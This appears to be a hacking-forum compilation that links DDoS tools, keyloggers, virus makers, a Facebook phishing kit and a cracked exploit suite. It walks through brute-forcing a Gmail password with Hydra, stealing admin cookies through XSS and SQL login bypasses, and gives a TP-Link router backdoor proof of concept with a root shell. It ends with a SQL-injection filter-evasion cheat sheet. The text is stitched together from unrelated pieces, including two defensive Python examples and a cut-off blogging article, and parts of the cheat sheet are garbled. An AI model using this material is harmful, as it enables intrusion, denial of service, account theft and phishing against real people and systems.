Summing up all the tools for hacking


TOOLS FOR DOWNLOAD AND INSTALLATION

********************************

SET 1
  DDoS Tools

-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr
-Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5
-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj
-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82
-LOIC http://www.mediafire.com/?79b5xqa10ddcnro
-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr
-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5
-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd
-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v
-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn
-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x
-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc
-Unicorn Booter (Download Link Available Soon)
-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8

big hackpack:
http://www.mediafire.com/?l5qds5n8bd1l5ma

DEFACE TOOLS/SQL

-RootKit http://www.mediafire.com/?iqrx57822ja4cbu
-Horny Monkey (Deface Maker) http://www.mediafire.com/?w0h8009g85zruaw
-xcvDefaceMaker http://www.mediafire.com/?u16ocimrui33aad
-xMid Deface Creator http://www.mediafire.com/?kmylctplymhl1g1
-Havij(SQL) http://www.mediafire.com/?637zfm7uwhfoobc
-Advanced Deface Page Maker http://www.mediafire.com/?it2dcbbulwkjoxh

PROTECT IP TOOLS (To be downloaded and installed):

SumRando: https://www.sumrando.com/
Real Hide IP: http://www.mediafire.com/?o454kp9q44d9h0w
Hotspot Shield: http://hotspotshield.com/
Expat Shield: http://expatshield.com/
SecurityKISS: http://www.securitykiss.com/
CyberGhost: http://cyberghostvpn.com/

ONLINE DDOS TOOLS (No installation required)

http://tlran.4rumer.com/h3-pa-dosser (from Bill Asas)
http://www.anonymous-russia.ru/loic.php
http://localleaks.me/plf/loic/Anonymous.html
http://m.loshackers.webnode.es/loic-online/

***


SET 2
(source: http://pastebin.com/RLG6hLbs)

For the #OpCyberProtest we have to get the following ready information to you.
Also the DDoS Attack Tools, as Anonymous also use it.

Windows User:
XOIC_1.3_SOURCECODE.zip
http://www.2shared.com/file/sG7AviXe...OURCECODE.html
BamBam.exe (Win7 or higher)
http://www.2shared.com/file/3vaeqOMd/BamBam.html

HttpDosTool3.6.zip
http://www.2shared.com/file/8iXJYzdC/HttpDosTool36.html

ByteDOS v3.2.zip
http://www.2shared.com/file/lvhn68uo/ByteDOS_v32.html

HOICv2.zip
http://www.2shared.com/file/sJhY2xE9/HOICv2.html

Mac OS X / Linux
torshammer.tgz
http://www.2shared.com/file/aJa597p_/torshammer.html

slowloris.pl
http://www.2shared.com/file/WpRBOI4P/slowloris.html

pyloris-3.2.zip
http://www.2shared.com/file/zmg_fnar/pyloris-32.html

(Mac OS X user also use the following command for the tools [chmod Anonymous X-Sect v2.0filename.formet})

All running Tools for Browser ==> WebHIVE
http://pastehtml.com/view/cagkzkk5q.html
http://pastehtml.com/view/cdvr011a5.html
http://pastehtml.com/view/ckok6t524.html ==> (AJAX 2nd-G)

Android App:
https://play.google.com/store/apps/d....mohammad.loic (recommended)
https://play.google.com/store/apps/details?id=l.o.i.c

Tor Browser Download:
https://www.torproject.org/download/...d-easy.html.en

Tor For Android:
https://play.google.com/store/apps/d...roject.android

iPhone Jailbreak:
http://www.sendspace.com/file/2cxxm0

***


SET 3
(source: http://www.facebook.com/events/503449256363589/)

Some tools to use:

DOS V3.2 http://www.mediafire.com/?pxv4pbxjg3a2vqa
Hoic V2.1 http://www.mediafire.com/?ddp9d5znwmgsasr
Turbinas V1.0 http://www.mediafire.com/?wo4sh527nf7wais
Slowloris http://www.mediafire.com/?6wbee516qfx6zok
SYN Flood DOS http://www.mediafire.com/?ja4x2odlxn7xcq3
TUNEL:http://www.securitykiss.com/resources/download/windows/
HOTSPOT SHIELD: http://hotspot-shield.softonic.com/
ULTRA VPN: http://ultravpn.softonic.com/
CYBERGHOST: http://cyberghost-classic-vpn.softonic.com/
Tunnelbear 1.0: http://tunnelbear.softonic.com/


Some tools to hide your IP:

1. Anchor :- http://to.ly/6WRu
2. HSS :- http://www.hotspotshield.com/en (im using this)
3. VPN Reactor :- https://www.vpnreactor.com/ (Free)
4. Best Free VPN Service :- http://bestfreevpn.com/ (free)
5. Hide My IP :- http://www.hide-my-ip.com/
6. ProXPN :- http://proxpn.com/ (Free)
7. CyberGhost :- https://cyberghostvpn.com/
8. TOR Onion :- https://www.torproject.org/download/...d-easy.html.en
9. SecurittyKiss :- http://www.securitykiss.com/
10. Your Freedom :- http://www.your-freedom.net/index.php?id=downloads
11. Proxygon :- http://www.mediafire.com/?tluqfna49i0xt74

======
big hackpack:
http://www.mediafire.com/?l5qds5n8bd1l5ma
======
BAMBAM Dos exe (official page for u scary ass loozrs who think we give out viruses)
http://www.anonoperations.com/bambam/

***


SET 4
(source: http://www.facebook.com/events/214308395371134/)

Protect:
SumRando: https://www.sumrando.com/
Real Hide IP: http://www.mediafire.com/?o454kp9q44d9h0w
Hotspot Shield: http://hotspotshield.com/
Expat Shield: http://expatshield.com/
SecurityKISS: http://www.securitykiss.com/
CyberGhost: http://cyberghostvpn.com/

Attack:
HOIC, LOIC: http://goo.gl/yJS3i
ByteDOS: http://www.mediafire.com/?o834t228cs64869
Anonymous Doser: http://goo.gl/Nvdw6
HTTPFlooder: http://www40.zippyshare.com/v/57080337/file.html
Anonymous Attacker Package: http://goo.gl/RC70j

Tutorial ByteDOS: http://youtu.be/_ozojDbSvuE
Tutorial HOIC: http://youtu.be/A-8LIYazAVY or http://youtu.be/qmhDQtsbPAk

-collection of tools from gaza hacker team:
http://www.4shared.com/rar/qB4gN_QJ/...r_700l5_4.html
-decent hacking tools
1. Keyloggers

-Project Neptune v2.0 http://project-neptune.net/download/

-Refrog Keylogger https://www.refog.com/download.html

-Rinlogger http://www.mediafire.com/?p5al7gnhfd020a5

-Emissary Keylogger http://www.mediafire.com/?y9mu87av2t3q2ia


2. DDoS Tools

-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr

- Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5

-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj

-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82

-LOIC http://www.mediafire.com/?79b5xqa10ddcnro

-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr

-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5

-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd

-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v

-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn

-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x

-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc

-Unicorn Booter (Download Link Available Soon)

-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8


3. Deface Tools/SQL

-RootKit http://www.mediafire.com/?iqrx57822ja4cbu

- Horny Monkey (Deface Maker) http://www.mediafire.com/?w0h8009g85zruaw

-xcvDefaceMaker http://www.mediafire.com/?u16ocimrui33aad

-xMid Deface Creator http://www.mediafire.com/?kmylctplymhl1g1

-Havij(SQL) http://www.mediafire.com/?637zfm7uwhfoobc

-Advanced Deface Page Maker http://www.mediafire.com/?it2dcbbulwkjoxh

4. Virus Makers + Codes

-Virus-o-Matic http://www.mediafire.com/?vwh3t11vglq6jl0

-TeraVirus Maker http://www.mediafire.com/?9i7anih34gw8mi4

-Nick's Deadly Worm Maker v2.1 (I made it )http://www.mediafire.com/?rg6026d980d6s4q

-12 VIRUS CODES (Download Link Available Soon)


5. Other Tools

-BrutusA2 (Password Cracker) http://www.mediafire.com/?1ljbsyxzavdbxys

-Facebook Phishing Site http://www.mediafire.com/?36mcwd5r7waj3mi

-iStealer_1.6_Legends http://www.mediafire.com/?4vwaaofchw89msh

-Resource Hacker (Change .exe Icons) http://www.mediafire.com/?as1fhbecq3w5t04

-Cheat Engine (Hack Flash Games) http://www.mediafire.com/?cq0r3acmxxo36o6

-Facebook FreezerForeever http://www.mediafire.com/?qqn1u1vd8nobl3m

-HackStars Spammer V.2 http://www.mediafire.com/?qg48x8x8cwqc2p3

-Star Crypter v1.2 (Download Link Available Soon)

-Hackers Colour Changer (CHANGE COLOUR IN ANYTHING ON YOUR COMPUTER)
http://www.mediafire.com/?k5cfu1pl457ma9g
 

How to do Hydra (Brute force Attack) to hack any E-mail Password


Brute-force attack

A brute-force attack is a password attack that does not attempt to decrypt any information, but simply keeps trying different passwords. For example, a brute-force attack may use a dictionary of all words or a list of commonly used passwords. To gain access to an account using a brute-force attack, a program tries every word it has until one gives access to the account. Another type of brute-force attack is a program that runs through all letters, or letters and numbers, until it gets a match.



Although a brute-force attack may be able to gain access to an account eventually, these attacks can take several minutes or hours to run. The amount of time it takes to complete these attacks depends on how complicated the password is and how well the attacker knows the target.

To help prevent brute-force attacks many systems will only allow a user to make a mistake in entering their username or password three or four times. If the user exceeds these attempts, the system will either lock them out of the system or prevent any future attempts for a set amount of time.
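
The lockout rule described above, as an added Python example (not part of the original tutorial): failures are counted per account inside a time window, and once the limit is reached every further attempt is refused without evaluating the password until the lockout expires. The class and function names, the limits (3 failures, 300 s window, 900 s lockout), the account and the passwords are assumptions constructed for illustration.

```python
import hashlib
import hmac
import time
from collections import defaultdict, deque


class ManualClock:
    """Controllable clock so the demo does not have to sleep (constructed helper)."""
    def __init__(self):
        self.now = 0.0
    def __call__(self):
        return self.now
    def advance(self, seconds):
        self.now += seconds


class LoginThrottle:
    """Per-account failed-login limiter with a temporary lockout (assumed limits)."""

    def __init__(self, max_failures=3, window=300.0, lockout=900.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window          # seconds during which failures are counted
        self.lockout = lockout        # seconds an account stays locked
        self.clock = clock
        self._failures = defaultdict(deque)   # account -> times of recent failures
        self._locked_until = {}               # account -> time the lockout ends

    def is_locked(self, account):
        until = self._locked_until.get(account)
        if until is None:
            return False
        if self.clock() >= until:
            # Lockout expired: clear it and start counting from zero again.
            del self._locked_until[account]
            self._failures.pop(account, None)
            return False
        return True

    def record_failure(self, account):
        """Register one failed attempt; return True if the account is now locked."""
        if self.is_locked(account):
            return True
        now = self.clock()
        recent = self._failures[account]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()          # forget failures older than the window
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
            return True
        return False

    def attempt(self, account, password, verify):
        """Return 'locked', 'ok' or 'denied'; verify(account, password) -> bool."""
        if self.is_locked(account):
            return "locked"           # the password is not even checked
        if verify(account, password):
            self._failures.pop(account, None)
            return "ok"
        self.record_failure(account)
        return "denied"


# Constructed demo credential store (salted PBKDF2, values invented for the example).
_SALT = b"constructed-demo-salt"
ACCOUNT = "alice@example.test"

def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 10_000)

_USERS = {ACCOUNT: _hash("correct-horse-battery")}

def verify(account, password):
    stored = _USERS.get(account)
    return stored is not None and hmac.compare_digest(stored, _hash(password))


def demo():
    """Replay a five-entry guess list, one guess per second, then wait out the lockout."""
    clock = ManualClock()
    throttle = LoginThrottle(max_failures=3, window=300, lockout=900, clock=clock)
    guesses = ["123456", "password", "qwerty", "letmein", "correct-horse-battery"]
    outcomes = []
    for guess in guesses:
        outcomes.append(throttle.attempt(ACCOUNT, guess, verify))
        clock.advance(1)
    clock.advance(900)
    outcomes.append(throttle.attempt(ACCOUNT, "correct-horse-battery", verify))
    return outcomes


if __name__ == "__main__":
    print(demo())
```

Per-account lockout lets anyone who knows a username lock its owner out, and it does not slow an attacker who tries one password against many accounts, so it is usually combined with per-source rate limiting.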

# So here we are going to use Backtrack 5, Hydra Attack. I will use fake G-mail a/c for this tutorial.

# Requirements.
* Backtrack 4 or 5 with Internet connection
* Password.txt file (That contains Possible passwords)
* Brain !!

# For example, I took a fake G-mail ID (hackerseven5@gmail.com) as my victim;
its password is '521478963'. Suppose I know the possibilities for the
password, so I will make a password.txt file to do the brute-force attack, like
this >>>>>>>>

# Now it's time to start attack !! using Hydra gtk,
Go to>Application>Backtrack>Privilege Escalation>Password Attacks>Online Attacks>hydra-gtk.


# And it will start like this >>>>>>


# Fill all info in this way !!
* Single Target = smtp.gmail.com
* Port = 465
* Protocol = smtp
* mark = Use SSL, Be Verbose, Show Attempts

# As shown in this Image >>>>>>>>


# After setting your Target, go on Password tab >>

# Fill all info in this way !!
* Username = G-mail ID (hackerseven5@gmail.com)
* Password list = upload your file of possible passwords
(save your password.txt file on desktop)

# After that, go to the Start tab and click on Start !!

# So, your Brute Force Attack has been started !!


# After that it will run the brute-force attack, trying to log in with every password
in the list of possible passwords. If you are lucky !! it will show a success message like this >>>>>

>>>>>>>>>>>>>>>>>Viv EK<<<<<<<<<<<<<<<<<<<
I know that using this attack it is very hard to hack any G-mail password, but it can help you to recover your hacked ID or forgotten password.
 

Secrets of Hacking ~ The Basics



Many of us try to hack sites every day, and most of the time we fail.
But there are some people with a great talent for hacking any site, and we think, "GOD ... I want to be like him".
This happens to all of us ... right?
But the thing that irritates us most is when a PRO hacker cannot hack a site and the same site is hacked by a new hacker who has just started learning hacking, and we think, "how the hell did he do it?"
This, my friend, is where you beat the PRO by being a noob.

Here we will discuss some very small mistakes site admins make which lead to site defacement ...

1) Many of us may be familiar with SQL injection, and a lot of the time we inject the site and get the admin password, but we cannot go further because we don't have the admin panel location. Here are some ways to find the admin panel:

   a) First of all, check whether a robots.txt file exists and, if so, whether an admin link is in it. If you cannot find any admin-related folder / file, then open every file / folder the admin has put under disallow, because there must be something in it that the admin wants to hide from us.

  b) If the robots.txt method does not work, then crawl the site. Sometimes the admin puts images or uploads in the admin folder itself, and from them we can get the admin folder.

  c) As a third try, use some admin finder tools. Use havij or admin finder pro or something else which can brute force admin folder / file names. This does not work all the time but is worth a shot.

  d) Sometimes the admin is really smart and blocks every possible way to find the admin link. But he still makes mistakes. There is a golden rule in security, "NEVER SET THE SAME PASSWORD FOR TWO LOGINS", but most admins ignore it: he uses the same password for his admin panel and for cPanel. So check whether cPanel is there and, if it is, try the admin password there. Also, if you find an email address on the site, try that password on his email too. Who knows, the password may work, and from his mails you may get root passwords if the site is a hosting site; it has worked for me many times.

  e) If the site is vulnerable to SQL injection and the admin is not using a standard CMS like wordpress or joomla, then also try SQL login bypasses like 'OR' '=' , 'OR 1=1 and so on ... Also try some common passwords like admin : admin , password , 123456 , 12345678 , pass123 , password123 , root , toor , r00t , t00r , nimda (reverse of admin)

2) Many admins secure their sites against most major attacks but forget to patch low-impact vulnerabilities.

  a) Many admins do not set a custom error page and keep the default application error message. It is not a critical mistake, but an application error message can disclose whether apache is there, whether frontpage is there, versions etc.

  b) Many admins also take directory listing lightly. Sometimes it also leads to information leaks. So whenever you find directory listing open, look at every file in it; who knows, you may find more than what you were searching for.

  c) Some small-site admins do not take XSS seriously. They underestimate the power of XSS. What you do, if you find XSS in his site, is just write a simple mail to the admin saying you have found XSS here. The admin will surely open that link directly and his cookie will be sent to you from that XSS. Also, XSS is so developed now that there are tools like Xssexploit , xsstunel with which you can hijack the computers of people who visit the exploited link. Who knows, you can mail the xssexploited link to the admin saying you found porn on his site at this link, and he will surely open that link and you get his computer ;)

  d) Some misconfigurations lead to local path disclosure, and the admin thinks, "what can a hacker do with my local path?" But my dear friend .. a hacker can do anything with any information. There is a command in SQL called into outfile with which you can directly shell the site from SQL injection. Here is the video explaining how:

http://www.youtube.com/watch?v=9T28FC6cny8
 

TP-Link HTTP/TFTP Backdoor



TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.




Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):



TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not responsible for any potential damages of the devices which are tested for this vulnerability.

Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
--2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

The router downloads a file (nart.out) from the host which has issued the HTTP request and executes it as root:

PoC – diagram

Sample captures from the host which issues the http request:

Wireshark filter used to show router tftp traffic

nart.out tftp request
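
A detection sketch for the traffic described above, added here as an example (it is not code from the advisory): it parses TFTP request payloads as laid out in RFC 1350 and flags a read request for nart.out that a router address sends to a LAN host. The function names, the packet tuples, the host addresses other than 192.168.0.1 and the "octet" transfer mode are constructed assumptions.

```python
import struct

TFTP_PORT = 69
OPCODES = {1: "RRQ", 2: "WRQ"}      # read request / write request
SUSPECT_FILE = "nart.out"           # file name taken from the write-up above


def parse_tftp_request(payload):
    """Parse a TFTP RRQ/WRQ payload. Return (op, filename, mode) or None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in OPCODES:
        return None                 # DATA, ACK, ERROR and so on
    # Layout: opcode | filename | 0 | mode | 0 | [option | 0 | value | 0 ...]
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None                 # truncated, or NUL terminators missing
    try:
        filename = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None
    return OPCODES[opcode], filename, mode


def find_nart_requests(packets, router_ips):
    """packets: iterable of (src_ip, dst_ip, dst_port, udp_payload) tuples.

    Return one record per read request for nart.out sent by a router address.
    """
    hits = []
    for src, dst, dport, payload in packets:
        if dport != TFTP_PORT or src not in router_ips:
            continue
        parsed = parse_tftp_request(payload)
        if parsed is None:
            continue
        op, filename, mode = parsed
        basename = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if op == "RRQ" and basename == SUSPECT_FILE:
            hits.append({"router": src, "tftp_server": dst,
                         "file": filename, "mode": mode})
    return hits


# Constructed UDP payloads for the demo; these are not captures from a real device.
SAMPLE_PACKETS = [
    ("192.168.0.1", "192.168.0.100", 69, b"\x00\x01nart.out\x00octet\x00"),
    ("192.168.0.50", "192.168.0.100", 69,
     b"\x00\x01pxelinux.0\x00octet\x00blksize\x001468\x00"),   # other client, other file
    ("192.168.0.1", "192.168.0.100", 69, b"\x00\x03\x00\x01data"),  # DATA, not a request
    ("192.168.0.1", "192.168.0.100", 69, b"\x00\x01nart.out"),      # truncated request
    ("192.168.0.1", "192.168.0.100", 53, b"\x00\x01nart.out\x00octet\x00"),  # wrong port
]


if __name__ == "__main__":
    for hit in find_nart_requests(SAMPLE_PACKETS, {"192.168.0.1"}):
        print("router %(router)s asked %(tftp_server)s for %(file)s" % hit)
```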

Models affected
  • TL-WDR4300
  • TL-WR743ND (v1.2 v2.0)
History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure
 

Phrozen Keylogger Lite v1.0 download

Phrozen Keylogger Lite is finally available, developed by Dark comet RAT developer. Phrozen Keylogger Lite is a powerful and user friendly keylogger especially created for Microsoft Windows systems. Phrozen Keylogger Lite is compatible with all currently supported versions of Windows, which effectively means Windows XP to the recently released Windows 8.

Phrozen Keylogger Lite has been especially created to capture all keystrokes from any type of keyboard (PS/2, USB and even Virtual Keyboards). The captured keystrokes are stored into a local database. There they are sorted by their process name and the active window into a log. Phrozen Keylogger Lite is running silently in background. When the program is successfully installed on a computer, it will capture all keystrokes fully stealthily and the program will remain hidden from every user. It will not slow down the computer it is installed on.
If you want to consult the logs of the current day or previous days just press the so-called “Magic Shortcut” and enter your personal password and the logs will be made visible in a new window. You can easily manage, export, delete, mark as important, mail, etc. these logs. Phrozen Keylogger Lite also gives you the possibility to manage black listed words. When such a word is entered via keystrokes you will immediately be sent a mail which contains the entire context in which that ‘black listed word’ appears. This is a very useful feature: suppose you have forbidden your son to go to a specific gambling site and he does go there against your wishes, you then immediately get a mail that warns you of this transgression.

Download Phrozen Keylogger Lite v1.0
 

DNS HIJACKING


Here is a beautiful Tut From my dear friend H4x4rwOw on DNS HIJACKING
Recommended to download and watch
Download Here
Note:- Only for Educational purpose
 

[J2TeaM] Facebook Information v1.0

01

Main GUI


02

Scan information about Personal User


03

Scan information about Fan Page


04

Auto detect input is User or Fan Page


Facebook Information <version 1.0>
Home page: http://junookyo.blogspot.com/

About:
+ Facebook Information is a simple tool for check information about anyone.


Features:
+ You just need to enter your username and press Check (Example username: juno_okyo or full URL: http://www.facebook.com/junookyo).
+ Automatically detects the input is Personal user or Fan Page.
+ Scan information from the Facebook Graph server.
+ If you want to export information, press Ctrl+S to save.

The software is distributed under the terms of the GNU General Public
License version 2 or later.

Download:
Click here to download!
SHA1 Checksum: 0695f7db598585df88a62ac769d5cda2529ef6be
 

Thanks for using!

Coded by Juno_okyo.
 

Get Most Traffic to your Blog


1) Blog frequently
Most new bloggers dislike hearing this. Trust me when I say that the struggle for content is ongoing. New bloggers, however, feel like it’s just happening to them. The truth is, don’t get a blog just to have a blog. Get it and keep it updated. It’s the quickest way to gaining traffic. How often should you blog? Three times a week. The best days to blog? Studies have shown that Tuesday, Wednesday, and Thursday are key days for blogging.


2) Stay on point
I tell authors this a lot: stay on point, stay on topic. Why? Because if you don’t you’ll lose readership. Once someone commits to your blog they want to keep reading relevant information. So don’t blog one day about your book, your speaking, or your mission and the next day share Aunt Ethel’s pot roast recipe.


3) Plan your blogs

While spontaneity is the catalyst for creativity, planning is a good way to stay on track. Start to map out key dates that you want to blog about that have some relation to your topic – this way when you’re at a loss for topics, you can always pick one from your list of planned out blogs. Also, consider these topics to blog about:
a) Future predictions: everyone loves these, to the degree that you can predict market trends in your industry do it, and the readership will follow.
b) Discuss industry news: what’s happening in your industry that you can talk about? Even if you’re a fiction writer there’s always *something* going on worth mentioning in publishing, writing, or marketing that directly relates to your topic.
c) The elephant in the room: talk about the stuff that everyone is afraid of. What new trends are emerging that consumers/readers/companies need to be aware of? What’s next for your market and how will it affect the industry? How can we keep publishing books when we already publish 800 a day? You see what I mean? Think of things that frighten you and talk about them. People will respond. Every time I do this I get a ton of comments on my b
 

WappeX v 2.0 Cracked - Full Version



WappeX aka Web Application Exploiter is a Multi Vulnerability Scanning + Exploiting tool .
It contains all Hacking tool / Exploiting Tool for pentesting the Website via SQL Injection.

Team Has added the  Havij also , one of the most Used Hacking tool .
Wappex is Completely a Package of Hacking tool. 



Features of Wappex v2.0 :-

  • An exploit database covering a wide range of vulnerabilities.
  • A set of tools useful for penetration testing:
    • Manual Request
    • Dork Finder
    • Exploit Editor
    • Hidden File Checker
    • Neighbor Site Finder
    • Find Login Page
    • Online Hash Cracker
    • Encoder/Decoder
  • Execute multiple instances of one or more exploits simultaneously.
  • Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
  • Test a list of target URL’s against a number of selected exploits.
  • Allows you to create your own exploits and payloads and share them online.
  • A number of featured exploits (6) and payloads (39) bundled within the software 
  • exploit database:
    • Testing and exploiting of Local File Inclusion vulnerabilities
    • Testing and exploiting of Local File Disclosure vulnerabilities
    • Testing and exploiting of Remote File Inclusion vulnerabilities
    • Testing and exploiting of SQL Injection vulnerabilities
    • Testing and exploiting of Remote Command Execution Inclusion vulnerabilities
    • Testing and exploiting of Server-side Code Injection vulnerabilities


http://cleanfiles.net/?yWWA6u3







 

Master Sql Cheat With Waf sheets


SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL



Whitespaces
% 20% 09% 0a% 0B% 0c% 0d% a0 / ** /
'Or + (1) sounds / ** / like "1" -% a0-
'Union (select (1), tabe_name, (3) from `information_s Chema`. `Tables`) #

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a '
SELECT b'1100001 '
SELECT _binary'1100001 '
SELECT x'61 '

Strings without quotes
'Abc' = 0 × 616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users

Typecasting
'Or true = '1 # or 1 = 1
'Or round (pi (), 1) + true + true = version () # or 3.1 +1 +1 = 5.1
'Or '1 # or true

Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = "="
select * from users where false = "
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = "-"
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter

General function filtering
ascii (97)
LOAD_FILE / * foo * / (0 × 616 263)

Strings with functions
'Abc' = unhex (616 263)
'Abc' = char (97,98,99)
hex ('a') = 61
ascii ('a') = 97
ord ('a') = 97
'ABC' = concat (conv (10,10,36), conv (11,10,36), conv (12,10,36))

Strings Extracted from gadgets
collation (\ N) / / binary
collation (user ()) / / utf8_general_ci
@ @ Time_format / /% H:% i:% s
@ @ Binlog_format / / MIXED
@ @ Version_comment / / MySQL Community Server (GPL)
dayname (from_days (401)) / / Monday
dayname (from_days (403)) / / Wednesday
monthname (from_days (690)) / / November
monthname (from_unixtime (1)) / / January
collation (convert ((1) using / ** / koi8r)) / / koi8r_general_ci
(Select (collation_name) from (information_schema.col lations) where (id) = 2) / / latin2_czech_cs

Special characters Extracted from gadgets
AES_ENCRYPT (1.12) / / 4CH ± {? "^ c × HeEEa
DES_ENCRYPT (1,2) / /, / iOk
@ @ Ft_boolean_syntax / / + -> <() ~ *: "" & |
@ @ DATE_FORMAT / /% Y-% m-% d
@ @ Innodb_log_group_home_dir / /. \

Integer representations
false: 0
true: 1
true + true: 2
floor (pi ()): 3
ceil (pi ()): 4
floor (version ()): 5
ceil (version ()): 6
ceil (pi () + pi ()): 7
floor (version () + pi ()): 8
floor (pi () * pi ()): 9
ceil (pi () * pi ()): 10
concat (true, true): 11
ceil (pi () * pi ()) + true: 11
ceil (pi () + pi () + version ()): 12
floor (pi () * pi () + pi ()): 13
ceil (pi () * pi () + pi ()): 14
ceil (pi () * pi () + version ()): 15
floor (pi () * version ()): 16
ceil (pi () * version ()): 17
ceil (pi () * version ()) + true: 18
floor ((pi () + pi ()) * pi ()): 19
ceil ((pi () + pi ()) * pi ()): 20
ceil (ceil (pi ()) * version ()): 21
concat (true + true, true): 21
ceil (pi () * ceil (pi () + pi ())): 22
ceil ((pi () + ceil (pi ())) * pi ()): 23
ceil (pi ()) * ceil (version ()): 24
floor (pi () * (version () + pi ())): 25
floor (version () * version ()): 26
ceil (version () * version ()): 27
ceil (pi () * pi () * pi () - pi ()): 28
floor (pi () * pi () * floor (pi ())): 29
ceil (pi () * pi () * floor (pi ())): 30
concat (floor (pi ()), false): 30
floor (pi () * pi () * pi ()): 31
ceil (pi () * pi () * pi ()): 32
ceil (pi () * pi () * pi ()) + true: 33
ceil (pow (pi (), pi ()) - pi ()): 34
ceil (pi () * pi () * pi () + pi ()): 35
floor (pow (pi (), pi ())): 36

@ @ New: 0
@ @ Log_bin: 1

! Pi (): 0
!! Pi (): 1
true-~ true: 3
log (-cos (pi ())): 0
-Cos (pi ()): 1
coercibility (user ()): 3
coercibility (now ()): 4

minute (now ())
hour (now ())
(NOW ())
week (now ())
month (now ())
year (now ())
quarter (now ())
year (@ @ timestamp)
